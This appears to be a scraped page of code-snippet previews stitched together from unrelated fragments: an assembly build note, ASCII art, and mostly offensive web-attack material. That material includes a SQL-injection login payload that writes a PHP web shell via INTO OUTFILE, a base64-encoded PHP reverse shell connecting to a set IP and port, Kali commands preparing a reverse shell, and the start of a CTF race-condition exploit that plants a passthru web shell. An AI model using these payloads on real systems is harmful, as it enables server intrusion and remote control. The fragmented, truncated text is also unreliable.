how to assemble and link:
nasm -f elf32 -o <filename>.o <filename>.asm
ld -m elf_i386 -o <filename> <filename>.o
template code (hello world):
section .text
global _start
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
myusername=john&mypassword=-9334' OR 1908=1908 limit 0,0 union all select "<?php eval(base64_decode(",”'c2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4yMDAuMyc7ICAvLyBDSEFOR0UgVEhJUwokcG9ydCA9IDQ0MzsgICAgICAgLy8gQ0hBTkdFIFRISVMKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwoKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKY2hkaXIoIi8iKTsKCnVtYXNrKDApOwoKCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0 |
<?php eval(base64_decode('<codigo em base64')); ?> |
myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE | |
'/var/www/meu-lindo-shell.php' LINES TERMINATED BY | |
0x3c3f7068 (... todo o hexa aqui ...)-- - |
root@kbca# locate webshell | grep revers | |
/usr/share/webshells/jsp/jsp-reverse.jsp | |
/usr/share/webshells/perl/perl-reverse-shell.pl | |
/usr/share/webshells/php/php-reverse-shell.php | |
root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php | |
# >>>> Precisamos Substituir o IP e Porta <<<< | |
root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php | |
$ip = '127.0.0.1'; // CHANGE THIS |
#!/usr/bin/env python3 | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
see: https://gist.github.com/UniIsland/3346170 | |
""" | |
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit | |
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
## passwords.txt payload content | |
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> | |
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
from subprocess import Popen, PIPE, STDOUT |